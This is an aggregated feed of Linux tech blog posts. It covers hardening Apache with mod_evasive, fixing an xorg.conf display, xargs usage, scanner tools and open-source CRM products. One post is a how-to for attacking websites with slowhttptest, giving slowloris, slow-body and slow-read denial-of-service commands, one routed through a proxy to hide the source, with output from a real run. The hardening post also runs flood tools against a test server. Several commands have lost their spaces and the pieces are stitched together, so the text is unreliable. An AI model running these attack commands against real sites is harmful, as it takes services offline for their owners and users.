1) DOSEmailNotify: Sends an email to the address specified whenever an IP address becomes blacklisted. It needs a valid email address as argument. If SELinux status is set to enforcing, you will need to grant the user apache SELinux permission to send emails. That is, run this command as root:
# setsebool -P httpd_can_sendmail 1
Then add this directive in the mod_evasive.conf file:
1
DOSEmailNotify you@yourdomain.com
2. DOSSystemCommand: Executes a custom system command whenever an IP address becomes blacklisted. It may come in handy to add firewall rules to block offending IPs altogether.
1
DOSSystemCommand <command>
We will use this directive to add a firewall rule through the following script (/etc/httpd/scripts/ban_ip.sh):
1
2
3
4
5
6
7
8
9
10
11
12
13
#!/bin/sh
# Offending IP as detected by mod_evasive
IP=$1
# Path to iptables binary executed by user apache through sudo
IPTABLES="/sbin/iptables"
# mod_evasive lock directory
MOD_EVASIVE_LOGDIR=/tmp
# Add the following firewall rule (block IP)
$IPTABLES -I INPUT -s $IP -j DROP
# Unblock offending IP after 2 hours through the 'at' command; see 'man at' for further details
echo"$IPTABLES -D INPUT -s $IP -j DROP"| at now + 2 hours
# Remove lock file for future checks
rm-f "$MOD_EVASIVE_LOGDIR"/dos-"$IP"
Our DOSSystemCommand directive will then read as follows:
1
DOSSystemCommand "sudo /etc/httpd/scripts/ban_ip.sh %s"
Don't forget to update sudo permissions to run our script as apache user:
# vi /etc/sudoers
1
2
apache ALL=NOPASSWD: /usr/local/bin/scripts/ban_ip.sh
Defaults:apache !requiretty

Simulating DoS Attacks

We will use three tools to stress test our Apache web server (running on CentOS 6.5 with 512 MB of RAM and a AMD Athlon II X2 250 Processor), with and without mod_security and mod_evasive enabled, and check how the web server behaves in each case.
Make sure you ONLY perform the following steps in your own test server and NOT against an external, production web site.
In the following examples, replace http://centos.gabrielcanepa.com.ar/index.php with your own domain and a file of your choosing.

Linux-based tools

1. Apache bench: Apache server benchmarking tool.
# ab -n1000 -c1000 http://centos.gabrielcanepa.com.ar/index.php
  • -n: Number of requests to perform for the benchmarking session.
  • -c: Number of multiple requests to perform at a time.
2. test.pl: a Perl script which comes with mod_evasive module.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#!/usr/bin/perl
 
# test.pl: small script to test mod_dosevasive's effectiveness
 
use IO::Socket;
use strict;
 
for(0..100) {
  my($response);
  my($SOCKET) = new IO::Socket::INET( Proto   => "tcp",
                                      PeerAddr=> "192.168.0.16:80");
  if(! defined $SOCKET) { die $!; }
  print $SOCKET "GET /?$_ HTTP/1.0\n\n";
  $response = <$SOCKET>;
  print $response;
  close($SOCKET);
}

Windows-based tools

1. Low Orbit Ion Cannon (LOIC): a network stress testing tool. To generate a workload, follow the order shown in the screenshot below and DO NOT touch anything else

Stress Test Results

With mod_security and mod_evasive enabled (and the three tools running at the same time), the CPU and RAM usage peak at a maximum of 60% and 50%, respectively for only 2 seconds before the source IPs are blacklisted, blocked by the firewall, and the attack is stopped.
On the other hand, if mod_security and mod_evasive are disabled, the three tools mentioned above knock down the server very fast (and keep it in that state throughout the duration of the attack), and of course, the offending IPs are not blacklisted.

Conclusion

We can see that mod_security and mod_evasive, when properly configured, are two important tools to harden an Apache web server against several threats (not limited to DoS attacks) and should be considered in deployments exposed on the Internet.

Find HorizSync VertRefresh rates to fix Linux display issue – Why my display is stuck at 640×480?

$
0
0
http://www.blackmoreops.com/2014/08/29/fix-linux-display-issue-find-horizsync-vertrefresh-rates

I had this problem a few days back and it took me sometime to figure out what to do.
I have a NVIDIA GTX460 Graphics card on my current machine and a Acer 22" Monitor. After installing NVIDIA driver, my display was stuck at 640x480 and no matter what I do, nothing fixed it. This is an unusual problem with NVIDIA driver. I am assuming Intel and ATI driver might have similar issues.

Fix Linux display issue

So if you are having problem with your display or if your display is stuck at 640x480 then try the following:
Edit /etc/X11/xorg.conf file
root@kali:~# vi /etc/X11/xorg.conf

You will see something like this
Section "Monitor"
    # HorizSync source: edid, VertRefresh source: edid
    Identifier     "Monitor0"
    VendorName     "Unknown"
    ModelName      "Acer X223W"
    HorizSync       28.0 - 33.0
    VertRefresh     43.0 - 72.0
    Option         "DPMS"
EndSection

Now the lines that control display in monitor is the following two:
    HorizSync       28.0 - 33.0
    VertRefresh     43.0 - 72.0
Depending on your monitor size, you have to find the correct HorizSync VertRefresh rates.

Find supported HorizSync VertRefresh rates in Linux

This took me quite some time to determine exactly what I am looking for. I obviously tried xrandr command like anyone would do..
root@kali:~# xrandr --query

This gave me an output like the following
root@kali:~# xrandr --query
Screen 0: minimum 8 x 8, current 1680 x 1050, maximum 16384 x 16384
DVI-I-0 disconnected (normal left inverted right x axis y axis)
DVI-I-1 disconnected (normal left inverted right x axis y axis)
DVI-I-2 connected 1680x1050+0+0 (normal left inverted right x axis y axis) 474mm x 296mm
   1680x1050      60.0*+
   1600x1200      60.0  
   1440x900       75.0     59.9  
   1400x1050      60.0  
   1360x765       60.0  
   1280x1024      75.0  
   1280x960       60.0  
   1152x864       75.0  
   1024x768       75.0     70.1     60.0  
   800x600        75.0     72.2     60.3     56.2  
   640x480        75.0     72.8     59.9  
HDMI-0 disconnected (normal left inverted right x axis y axis)
DVI-I-3 disconnected (normal left inverted right x axis y axis)


Fix display issue in Linux - after installing NVIDIA driver, display stuck - blackMORE Ops -1
Bugger all, this doesn’t help me to find supported HorizSync VertRefresh rates. I went around looking for options and found this tool that will do exactly what you need to find.

Find monitor HorizSync VertRefresh rates with ddcprobe

First we need to install xresprobe which contains ddcprobe.
root@kali:~# apt-get install xresprobe
Fix display issue in Linux - after installing graphics driver, display stuck - Detect supported VertRefresh and HorizSync values - blackMORE Ops -2

Once xresprobe is installed, then we can run the following command to find all supported monitor HorizSync VertRefresh rates including supported Display Resolution … well the whole lot .. some even I wasn’t aware.
root@kali:~# ddcprobe 
vbe: VESA 3.0 detected.
oem: NVIDIA
vendor: NVIDIA Corporation
product: GF104 Board - 10410001 Chip Rev
memory: 14336kb
mode: 640x400x256
mode: 640x480x256
mode: 800x600x16
mode: 800x600x256
mode: 1024x768x16
mode: 1024x768x256
mode: 1280x1024x16
mode: 1280x1024x256
mode: 320x200x64k
mode: 320x200x16m
mode: 640x480x64k
mode: 640x480x16m
mode: 800x600x64k
mode: 800x600x16m
mode: 1024x768x64k
mode: 1024x768x16m
mode: 1280x1024x64k
mode: 1280x1024x16m
edid:
edid: 1 3
id: 000d
eisa: ACR000d
serial: 7430d0b5
manufacture: 43 2007
input: analog signal.
screensize: 47 30
gamma: 2.200000
dpms: RGB, active off, suspend, standby
timing: 720x400@70 Hz (VGA 640x400, IBM)
timing: 720x400@88 Hz (XGA2)
timing: 640x480@60 Hz (VGA)
timing: 640x480@67 Hz (Mac II, Apple)
timing: 640x480@72 Hz (VESA)
timing: 640x480@75 Hz (VESA)
timing: 800x600@60 Hz (VESA)
timing: 800x600@72 Hz (VESA)
timing: 800x600@75 Hz (VESA)
timing: 832x624@75 Hz (Mac II)
timing: 1024x768@87 Hz Interlaced (8514A)
timing: 1024x768@70 Hz (VESA)
timing: 1024x768@75 Hz (VESA)
timing: 1280x1024@75 (VESA)
ctiming: 1600x1200@60
ctiming: 1152x864@75
ctiming: 1280x960@60
ctiming: 1360x850@60
ctiming: 1440x1440@60
ctiming: 1440x1440@75
ctiming: 1400x1050@60
dtiming: 1680x1050@77
monitorrange: 31-84, 56-77
monitorserial: LAV0C0484010
monitorname: X223W
root@kali:~#
Now  the line I am interested is this:
monitorrange: 31-84, 56-77
That’s the highest supported HorizSync VertRefresh rates for my monitor.
Fix display issue in Linux - after installing graphics driver, display stuck - Detect supported VertRefresh and HorizSync values with ddcprobe - blackMORE Ops -3
ddcprobe also gave me few more useful info, like MonitorName and Monitor Serial.
monitorserial: LAV0C0484010
monitorname: X223W
Now time to put it all together.

Edit xorg.conf file to with correct HorizSync VertRefresh rates

So now we know the exact values we need to know. We can now edit our /etc/X11/xorg.conf file with the values we want. So I’ve edited my xorg.conf file to look like the following:
root@kali:~# vi /etc/X11/xorg.conf

Section "Monitor"
    # HorizSync source: edid, VertRefresh source: edid
    Identifier     "Monitor0"
    VendorName     "Unknown"
    ModelName      "Acer X223W"
    HorizSync       31.0 - 84.0
    VertRefresh     56.0 - 77.0

    Option         "DPMS"
EndSection
Save and exit xorg.conf file, restart and I am now enjoying 1680x1050 display on my Monitor. Here’s the xorg.conf file I have right now:
# nvidia-xconfig: X configuration file generated by nvidia-xconfig
# nvidia-xconfig:  version 304.48  (pbuilder@cake)  Wed Sep 12 10:54:51 UTC 2012

# nvidia-settings: X configuration file generated by nvidia-settings
# nvidia-settings:  version 304.88  (pbuilder@cake)  Wed Apr  3 08:58:25 UTC 2013

Section "ServerLayout"
    Identifier     "Layout0"
    Screen      0  "Screen0" 0 0
    InputDevice    "Keyboard0""CoreKeyboard"
    InputDevice    "Mouse0""CorePointer"
    Option         "Xinerama""0"
EndSection

Section "Files"
EndSection

Section "InputDevice"

    # generated from default
    Identifier     "Mouse0"
    Driver         "mouse"
    Option         "Protocol""auto"
    Option         "Device""/dev/psaux"
    Option         "Emulate3Buttons""no"
    Option         "ZAxisMapping""4 5"
EndSection

Section "InputDevice"

    # generated from default
    Identifier     "Keyboard0"
    Driver         "kbd"
EndSection

Section "Monitor"

    # HorizSync source: edid, VertRefresh source: edid
    Identifier     "Monitor0"
    VendorName     "Unknown"
    ModelName      "Acer X223W"
    HorizSync       31.0 - 84.0
    VertRefresh     56.0 - 77.0
    Option         "DPMS"
EndSection

Section "Device"
    Identifier     "Device0"
    Driver         "nvidia"
    VendorName     "NVIDIA Corporation"
    BoardName      "GeForce GTX 460"
EndSection

Section "Screen"
    Identifier     "Screen0"
    Device         "Device0"
    Monitor        "Monitor0"
    DefaultDepth    24
    Option         "Stereo""0"
    Option         "metamodes""nvidia-auto-select +0+0"
    SubSection     "Display"
        Depth       24
    EndSubSection
EndSection
This fixed my problem quite well. It might be useful to someone else out there.

Reference Websites and posts

The biggest help is always X.org website for any display related issues.
http://www.x.org/wiki/FAQVideoModes
I also later realized the that Eddy posted a similar problem in one of my posts where he fixed this problem too in exactly similar way.
doh! I should’ve just searched my own posts and readers comments. Eddy’s post doesn’t outline how to find the HorizSync VertRefresh rates though. Either way, Eddy’s post was the most accurate I found related with my problem.

Perform Multiple Operations in Linux with the ‘xargs’ Command

$
0
0
http://www.maketecheasier.com/mastering-xargs-command-linux

Xargs is a useful command that acts as a bridge between two commands, reading output of one and executing the other with the items read. The command is most commonly used in scenarios when a user is searching for a pattern, removing and renaming files, and more.
In its basic form, xargs reads information from the standard input (or STDIN) and executes a command one or more times with the items read.
As an illustration, the following xargs command expects the user to enter a file or a directory name:
xargsls-l
Once a name is entered, the xargs command passes that information to the ls command.
Here is the output of the above shown xargs command when I executed it from my home directory by entering “Documents” (which is a sub-directory in my Home folder) as an input:
xargs-basic-example
Observe that in this case, the xargs command executed the ls command with the directory name as a command line argument to produce a list of files present in that directory.
While the xargs command can be used in various command line operations, it comes in really handy when used with the find command. In this article, we will discuss some useful examples to understand how xargs and find can be used together.
Suppose you want to copy the contents of “ref.txt” to all .txt files present in a directory. While the task may otherwise require you to execute multiple commands, the xargs command, along with the find command, makes it simple.
Just run the following command:
find ./-name"*.txt"|xargs-n1cp ../ref.txt
To understand the command shown above, let’s divide it into two parts.
The first part is find ./ -name "*.txt" , which searches for all the .txt files present in the current directory.
The second part xargs -n1 cp ../ref.txt will grab the output of the first command (the resulting file names) and hand it over to the cp (copy) command one by one. Note that the -n option is crucial here, as it instructs xargs to use one argument per execution.
When combined together, the full command will copy the content of “ref.txt” to all .txt files in the directory.
One of the major advantages of using xargs is its ability to handle a large number of arguments. For example, while deleting a large number of files in one go, the rm command would sometimes fail with an “Argument list too long” error. That’s because it couldn’t simply handle such a long list of arguments. This is usually the case when you have too many files in the folder that you want to delete.
rm-arg-list-too-long
This can be easily fixed with xargs. To delete all these files, use the following command:
find ./rm-test/-name"*"-print|xargsrm
Software developers as well as system administrators do a lot of pattern searching while working on the command line. For example, a developer might want to take a quick look at the project files that modify a particular variable, or a system administrator might want to see the files that use a particular system configuration parameter. In these scenarios, xargs, along with find and grep, makes things easy for you.
For example, to search for all .txt files that contain the “maketecheasier” string, run the following command:
$ find ./-name"*.txt"|xargsgrep"maketecheasier"
Here is the output the command produced on my system:
find-xargs-grep
Xargs, along with the find command, can also be used to copy or move a set of files from one directory to another. For example, to move all the text files that are more than 10 minutes old from the current directory to the previous directory, use the following command:
find . -name"*.txt"-mmin +10|xargs -n1  -I'{}'mv'{}' ../
The -I command line option is used by the xargs command to define a replace-string which gets replaced with names read from the output of the find command. Here the replace-string is {}, but it could be anything. For example, you can use “file” as a replace-string.
find . -name"*.txt"-mmin10|xargs -n1  -I'file'mv'file' ./practice
Suppose you want to list the details of all the .txt files present in the current directory. As already explained, it can be easily done using the following command:
find . -name"*.txt"|xargsls-l
But there is one problem; the xargs command will execute the ls command even if the find command fails to find any .txt file. Here is an example:
find-xargs
So you can see that there are no .txt files in the directory, but that didn’t stop xargs from executing the ls command. To change this behaviour, use the -r command line option:
find . -name"*.txt"|xargs-rls-l
Although I’ve concentrated here on using xargs with find, it can also be used with many other commands. Go through the command’s main page to learn more about it, and leave a comment below if you have a doubt/query.

3 tools that make scanning on the Linux desktop quick and easy

$
0
0
https://opensource.com/life/14/8/3-tools-scanners-linux-desktop

Whether you're moving to a paperless lifestyle, need to scan a document to back it up or email it, want to scan an old photo, or whatever reason you have for making the physical electronic, a scanner comes in handy. In fact, a scanner is essential.
But the catch is that most scanner makers don't have Linux versions of the software that they bundle with their devices. For the most part, that doesn't matter. Why? Because there are good scanning applications available for the Linux desktop. They work with a variety of scanners, and do a good job.
Let's take a look at a three simple but flexible Linux scanning tools. Keep in mind that the software discussed below is hardly an exhaustive list of the scanner software that's available for the Linux desktop. It's what I've used extensively and found useful.
First up, Simple Scan. It's the default scanner application for Ubuntu and its derivatives like Linux Mint. Simple Scan is easy to use and packs a few useful features. After you've scanned a document or photo, you can rotate or crop it and save it as an image (JPEG or PNG only) or a PDF. That said, Simple Scan can be slow, even if you scan documents at lower resolutions. On top of that, Simple Scan uses a set of global defaults for scanning, like 150 dpi for text and 300 dpi for photos. You need to go into Simple Scan's preferences to change those settings.
Next up, gscan2pdf. It packs a few more features than Simple Scan but it's still comparatively light. In addition to being able to save scans in various image formats (JPEG, PNG, and TIFF), you can also save a scan as a PDF or a DjVu file. Unlike Simple Scan, gscan2pdf allows you to set the resolution of what you're scanning, whether it's black and white or colour, and paper size of your scan before you click the button. Those aren't killer features, but they give you a bit more flexibility.
Finally, The GIMP. You probably know it as an image editing tool. When combined with a plugin called QuiteInsane, The GIMP becomes a powerful scanning application. When you scan with The GIMP, you not only get the opportunity to set a number of options (for example, whether it's color or black and white, the resolution of the scan, and whether or not to compress results), you can also use The GIMP's tools to touch up or apply effects to your scans. This makes it perfect for scanning photos and art.

Do they really just work?

The software discussed above works well for the most part and with a variety of hardware. I've used Simple Scan, gscan2pdf, and The GIMP with QuiteInsane with three multifunction printers that I've owned over the years—whether using a USB cable or over wireless. They've even worked with a Fujitsu ScanSnap scanner. While Simple Scan, gscan2pdf, and The GIMP didn't have all the features of the ScanSnap Manager software (which is for Windows or Mac only), the ScanSnap did scan documents very quickly.
You might have noticed that I wrote works well for the most part in the previous paragraph. I did run into one exception: an inexpensive Canon multifunction printer. Neither Simple Scan, gscan2pdf, nor The GIMP could detect it. I had to download and install Canon's Linux scanner software, which did work.
Scanning on the Linux desktop can be easy. And there's a lot of great software with which to do it.
What's your favourite scanning tool for Linux? Share your pick by leaving a comment.

12 Open Source CRM Options

$
0
0
http://www.enterpriseappstoday.com/crm/12-open-source-crm-options.html


CRM isn't just limited to products from giants like Microsoft and Salesforce.com. There are a surprising number of open source options as well.

Talk about customer relationship management (CRM) software and you'll probably be thinking about on-premise software packages or software-as-a-service (SaaS) offerings from big companies like Salesforce.com, SAP, Oracle or Microsoft.
But as well as these and other commercial CRM offerings, there are also plenty of viable open source CRM solutions. Like other variants of open source software, many of them offer a free "community" edition as well as commercial open source editions which come with additional features and support.
Specialist third party consultants also offer paid support and help with implementation. They can also customize the open source code to match your organization's requirements.
Given that most CRM systems - proprietary or open source – include many of the same key features, the value of open source CRM systems comes from the fact that they can easily be customized, precisely because the source code is freely available, according to Greg Soper, managing director of SalesAgility, a consultancy that specializes in providing services for the popular SugarCRM open source product.

Leveraging Data Visualization to Meet Evolving BI and Big Data Requirements
Rather than trying to choose a commercial CRM product that offers most of the features you need, it makes more sense to pay a consultancy such as his to add the precise features you need to an open source product, Soper contends.
"Why not get the open source software that you plan to use for free, and then use the money that you would otherwise have spent on proprietary license fees to modify the open source software to meet your needs more closely?" he asks. "Why pay for software that is the same for all users when you can pay to have something that is unique?"
If you are interested in investigating open source CRM software, here are 12 solutions worth a closer look.
SugarCRM  is the most well known and arguably the most comprehensive open source CRM package, with all the standard features that you would expect from a commercial package.
The free Community Edition is available to download for Linux, UNIX and OS X. Subscription versions include support , mobile functionality, sales automation and forecasting, marketing lead management and other extra features. They range from $35 per user per month (with a minimum $4,200-per-year subscription) for the Pro version, to $150 per user per month for the Ultimate version, which includes enterprise opportunity management, enterprise forecasting, a customer self-service portal and custom activity streams, 24/7 support and an assigned technical account manager.
Vtiger is based on SugarCRM code and offers most - but not all - of SugarCRM's features. It has a few extra features of its own, such as inventory management and project management. It can be extended with official and third party add-ons such as a Microsoft Exchange connector and a Microsoft Outlook connector.
As well as the freely downloadable version, Vtiger offers its CRM as a SaaS product called Vtiger CRM on Demand for $12 per user per month including 5 gigabytes of storage and support. Mobile apps for iOS and Android are available for a $20 one-time fee per device.
SuiteCRMis another fork of SugarCRM. Its aim is to offer functionality similar to SugarCRM's commercial versions in a free community edition. (What prompted the fork was that SugarCRM announced in 2013 that it would no longer be releasing new code to its Community Edition, according to SuiteCRM.)
SuiteCRM is available to download and run free. Three hosted versions are also available for $16 per user per month: SuiteCRM Sales, SuiteCRM Service and SuiteCRM Max, which includes every feature of SuiteCRM. Basic forum-based support is free, while enhanced telephone, email and portal support is available for $8 per user per month.
Fat Free CRMis a Ruby on Rails-based open source CRM product which is lightweight, customizable and aimed at smaller businesses. Out of the box it comes with group collaboration, campaign and lead management, contact lists and opportunity tracking, but it can be extended with a number of plug-ins - or you can develop your own.
As the name suggests, Fat Free CRM eschews complex features and is designed to be simple to use with an intuitive user interface. It can be downloaded and run free, with source code available on Github. No commercial versions are offered.
Odoo is the new name for an open source business suite previously known as OpenERP. Odoo offers open source CRM software as well as other business apps including billing, accounting, warehouse management and project management.
The Community edition of Odoo CRM is available to download for free. The hosted version is available free for two users, and thereafter Euros 12 ($15 U.S) per user per month, including email support. A more comprehensive package that includes customization assistance and training materials is also available for Euros 111 ($140 U.S.) per user per month.
Zurmo includes standard CRM features like contact and activity management, deal tracking, marketing automation and reporting. What makes it different is that it also focuses on younger CRM users by offering gamification. This uses points, levels, badges, missions and leaderboards to encourage employees to use and explore Zurmo's features.
As well as a free downloadable version, Zurmo offers a hosted version that includes email and phone support, and integration with Outlook, Google Apps and Exchange, for $32 per user per month.
EspoCRMis a free Web-based CRM application that can be accessed from computers and mobile devices through a browser. Current features include sales automation, calendaring and customer support case management, with new features added every two months. Source code can be downloaded from Sourceforge, and support is available from a Web forum.
SplendidCRM is aimed at Windows shops. It is offered in a free Community version that includes core CRM features like accounts, contacts, leads and opportunities, a more complete commercial Pro version ($300 per user per year) that includes product and order management surveys, and an Enterprise version ($480 per user per year) with workflow, ad-hoc reporting and an offline client.
SplendidCRM also offers a hosted version for $10 per user per month for the Community version, $25 for the Pro and $40 for the Enterprise.
Other open source CRM solutions include:
OpenCRX
X2Engine
Concourse Suite
CentraView

Attack a website using slowhttptest from Linux and Mac

$
0
0
http://www.darkmoreops.com/2014/09/23/attacking-website-using-slowhttptest

SlowHTTPTest is a highly configurable tool that simulates some Application Layer Denial of Service attacks. It works on majority of Linux platforms, OSX and Cygwin – a Unix-like environment and command-line interface for Microsoft Windows.
It implements most common low-bandwidth Application Layer DoS attacks, such as slowloris, Slow HTTP POST, Slow Read attack (based on TCP persist timer exploit) by draining concurrent connections pool, as well as Apache Range Header attack by causing very significant memory and CPU usage on the server.
Slowloris and Slow HTTP POST DoS attacks rely on the fact that the HTTP protocol, by design, requires requests to be completely received by the server before they are processed. If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. If the server keeps too many resources busy, this creates a denial of service. This tool is sending partial HTTP requests, trying to get denial of service from target HTTP server.
Slow Read DoS attack aims the same resources as slowloris and slow POST, but instead of prolonging the request, it sends legitimate HTTP request and reads the response slowly.

slowhttptest logo - blackMORE Ops -3



Installation


Installation for Kali Linux users

For Kali Linux users, install via apt-get .. (life is good!)
root@kali:~# apt-get install slowhttptest
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following NEW packages will be installed:
  slowhttptest
0 upgraded, 1 newly installed, 0 to remove and 25 not upgraded.
Need to get 29.6 kB of archives.
After this operation, 98.3 kB of additional disk space will be used.
Get:1 http://http.kali.org/kali/ kali/main slowhttptest amd64 1.6-1kali1 [29.6 kB]
Fetched 29.6 kB in 1s (21.8 kB/s)     
Selecting previously unselected package slowhttptest.
(Reading database ... 376593 files and directories currently installed.)
Unpacking slowhttptest (from .../slowhttptest_1.6-1kali1_amd64.deb) ...
Processing triggers for man-db ...
Setting up slowhttptest (1.6-1kali1) ...
root@kali:~#

Install slow httptest - blackMORE Ops -1

For other Linux distributions

The tool is distributed as portable package, so just download the latest tarball from Downloads section, extract, configure, compile, and install:
$ tar -xzvf slowhttptest-x.x.tar.gz

$ cd slowhttptest-x.x

$ ./configure --prefix=PREFIX

$ make

$ sudo make install

Where PREFIX must be replaced with the absolute path where slowhttptest tool should be installed.
You need libssl-dev to be installed to successfully compile the tool. Most systems would have it.
Alternatively

Mac OS X

Using Homebrew:
brew update && brew install slowhttptest

Linux

Try your favorite package manager, some of them are aware of slowhttptest (Like Kali Linux).

Usage

slowhttptest is a great tool as it allows you to do many things. Following are few usages

Example of usage in slow message body mode

slowhttptest -c 1000-B -i 110-r 200-s 8192-t FAKEVERB -u https://myseceureserver/resources/loginform.html -x 10 -p 3
Same test with graph
slowhttptest -c 1000-B -g -o my_body_stats -i 110-r 200-s 8192-t FAKEVERB -u https://myseceureserver/resources/loginform.html -x 10 -p 3

Example of usage in slowloris mode

slowhttptest -c 1000-H -i 10-r 200-t GET -u https://myseceureserver/resources/index.html -x 24 -p 3
Same test with graph
slowhttptest -c 1000-H -g -o my_header_stats -i 10-r 200-t GET -u https://myseceureserver/resources/index.html -x 24 -p 3

Example of usage in slow read mode with probing through proxy

Here x.x.x.x:8080 proxy used to have website availability from IP different than yours:
slowhttptest -c 1000-X -r 1000-w 10-y 20-n 5-z 32-u http://someserver/somebigresource -p 5 -l 350 -e x.x.x.x:8080

Output

Depends on verbosity level, output can be either as simple as heartbeat message generated every 5 seconds showing status of connections with verbosity level 1, or full traffic dump with verbosity level 4.
-g option would generate both CSV file and interactive HTML based on Google Chart Tools.
Here is a sample screenshot of generated HTML page
HTML Report from SlowHTTPTest

that contains graphically represented connections states and server availability intervals, and gives the picture on how particular server behaves under specific load within given time frame.
CSV file can be used as data source for your favorite chart building tool, like MS Excel, iWork Numbers, or Google Docs.
Last message you’ll see is the exit status that hints for possible possible program termination reasons:
“Hit test time limit”program reached the time limit specified with -l argument
“No open connections left”peer closed all connections
“Cannot establish connection”no connections were established during first N seconds of the test, where N is either value of -i argument, or 10, if not specified. This would happen if there is no route to host or remote peer is down
“Connection refused”remote peer doesn’t accept connections (from you only? Use proxy to probe) on specified port
“Cancelled by user”you pressed Ctrl-C or sent SIGINT in some other way
“Unexpected error”should never happen

Sample output for a real test

I’ve done this test in a sample server and this is what I’ve seen from both attacking and victim end.

From attackers end

So, I am collection stats and attacking www.localhost.com with 1000 connections.
root@kali:~# slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://www.localhost.com -x 10 -p 3
Test output from a real slowhttptest - blackMORE Ops -2

Tue Sep 23 11:22:57 2014:
    slowhttptest version 1.6
 - https://code.google.com/p/slowhttptest/ -
test type:                        SLOW BODY
number of connections:            1000
URL:                              http://www.localhost.com/
verb:                             FAKEVERB
Content-Length header value:      8192
follow up data max size:          22
interval between follow up data:  110 seconds
connections per seconds:          200
probe connection timeout:         3 seconds
test duration:                    240 seconds
using proxy:                      no proxy

Tue Sep 23 11:22:57 2014:
slow HTTP test status on 85th second:

initializing:        0
pending:             23
connected:           133
error:               0
closed:              844
service available:   YES
^CTue Sep 23 11:22:58 2014:
Test ended on 86th second
Exit status: Cancelled by user
CSV report saved to my_body_stats.csv
HTML report saved to my_body_stats.html

From victim server end:

rootuser@localhost [/home]# pgrep httpd | wc -l
151
Total number of httpd connections jumped to 151 within 85 seconds. (I’ve got a fast Internet!)
And of course I want to see how what’s in my /var/log/messages
rootuser@someserver [/var/log]# tail -100 message | grep Firewall

Sep 23 11:43:39 someserver: IP 1.2.3.4 (XX/Anonymous/1-2-3-4) found to have 504 connections
As you can see I managed to crank up 504 connections from a single IP in less than 85 seconds … This is more than enough to bring down a server (well most small servers and VPS’s for sure).
To make it worse, you can do it from Windows, Linux and even a Mac… I am starting to wonder whether you can do it using a jailbroken iphone6 Plus OTA (4gplus is FAST) … or a Galaxy Note 4.. I can do it using my old Galaxy Nexus (rooted) and of course good old Raspberry Pi …

Further reading and references

  1. Slowhttptest in Google
  2. How I knocked down 30 servers using slowhttptest
  3. Slow Read DoS attack explained
  4. Test results of popular HTTP servers
  5. How to protect against slow HTTP DoS attacks
The logo is from http://openclipart.org/detail/168031/.

How to use xargs command in Linux

$
0
0
http://xmodulo.com/xargs-command-linux.html

Have you ever been in the situation where you are running the same command over and over again for multiple files? If so, you know how tedious and inefficient this can feel. The good news is that there is an easier way, made possible through the xargs command in Unix-based operating systems. With this command you can process multiple files efficiently, saving you time and energy. In this tutorial, you will learn how to execute a command or script for multiple files at once, avoiding the daunting task of processing numerous log files or data files individually.
There are two ingredients for the xargs command. First, you must specify the files of interest. Second, you must indicate which command or script will be executed for each of the files you specified.
This tutorial will cover three scenarios in which the xargs command can be used to process files located within several different directories:
  1. Count the number of lines in all files
  2. Print the first line of specific files
  3. Process each file using a custom script
Consider the following directory named xargstest (the directory tree can be displayed using the tree command with the combined -i and -f options, which print the results without indentation and with the full path prefix for each file):
$ tree -if xargstest/

The contents of each of the six files are as follows:

The xargstest directory, its subdirectories and files will be used in the following examples.

Scenario 1: Count the number of lines in all files

As mentioned earlier, the first ingredient for the xargs command is a list of files for which the command or script will be run. We can use the find command to identify and list the files that we are interested in. The -name 'file??' option specifies that only files with names beginning with "file" followed by any two characters will be matched within the xargstest directory. This search is recursive by default, which means that the find command will search for matching files within xargstest and all of its sub-directories.
$ find xargstest/ -name 'file??'
xargstest/dir3/file3B
xargstest/dir3/file3A
xargstest/dir1/file1A
xargstest/dir1/file1B
xargstest/dir2/file2B
xargstest/dir2/file2A
We can pipe the results to the sort command to order the filenames sequentially:
$ find xargstest/ -name 'file??' | sort
xargstest/dir1/file1A
xargstest/dir1/file1B
xargstest/dir2/file2A
xargstest/dir2/file2B
xargstest/dir3/file3A
xargstest/dir3/file3B
We now need the second ingredient, which is the command to execute. We use the wc command with the -l option to count the number of newlines in each file (printed at the beginning of each output line):
$ find xargstest/ -name 'file??' | sort | xargs wc -l
 1 xargstest/dir1/file1A
2 xargstest/dir1/file1B
3 xargstest/dir2/file2A
4 xargstest/dir2/file2B
5 xargstest/dir3/file3A
6 xargstest/dir3/file3B
21 total
You'll see that instead of manually running the wc -l command for each of these files, the xargs command allows you to complete this operation in a single step. Tasks that may have previously seemed unmanageable, such as processing hundreds of files individually, can now be performed quite easily.

Scenario 2: Print the first line of specific files

Now that you know the basics of how to use the xargs command, you have the freedom to choose which command you want to execute. Sometimes, you may want to run commands for only a subset of files and ignore others. In this case, you can use the find command with the -name option and the ? globbing character (matches any single character) to select specific files to pipe into the xargs command. For example, if you want to print the first line of all files that end with a "B" character and ignore the files that end with an "A" character, use the following combination of the find, xargs, and head commands (head -n1 will print the first line in a file):
$ find xargstest/ -name 'file?B' | sort | xargs head -n1
==> xargstest/dir1/file1B <==
one

==> xargstest/dir2/file2B <==
one

==> xargstest/dir3/file3B <==
one
You'll see that only the files with names that end with a "B" character were processed, and all files that end with an "A" character were ignored.

Scenario 3: Process each file using a custom script

Finally, you may want to run a custom script (in Bash, Python, or Perl for example) for the files. To do this, simply substitute the name of your custom script in place of the wc and head commands shown previously:
$ find xargstest/ -name 'file??' | xargs myscript.sh
The custom script myscript.sh needs to be written to take a file name as an argument and process the file. The above command will then invoke the script for every file found by find command.
Note that the above examples include file names that do not contain spaces. Generally speaking, life in a Linux environment is much more pleasant when using file names without spaces. If you do need to handle file names with spaces, the above commands will not work, and should be tweaked to accommodate them. This is accomplished with the -print0 option for find command (which prints the full file name to stdout, followed by a null character), and -0 option for xargs command (which interprets a null character as the end of a string), as shown below:
$ find xargstest/ -name 'file*' -print0 | xargs -0 myscript.sh
Note that the argument for the -name option has been changed to 'file*', which means any files with names beginning with "file" and trailed by any number of characters will be matched.

Summary

After reading this tutorial you will understand the capabilities of the xargs command and how you can implement this into your workflow. Soon you'll be spending more time enjoying the efficiency offered by this command, and less time doing repetitive tasks. For more details and additional options you can read the xargs documentation by entering the 'man xargs' command in your terminal.

How to turn your CentOS box into an OSPF router using Quagga

$
0
0
http://xmodulo.com/turn-centos-box-into-ospf-router-quagga.html

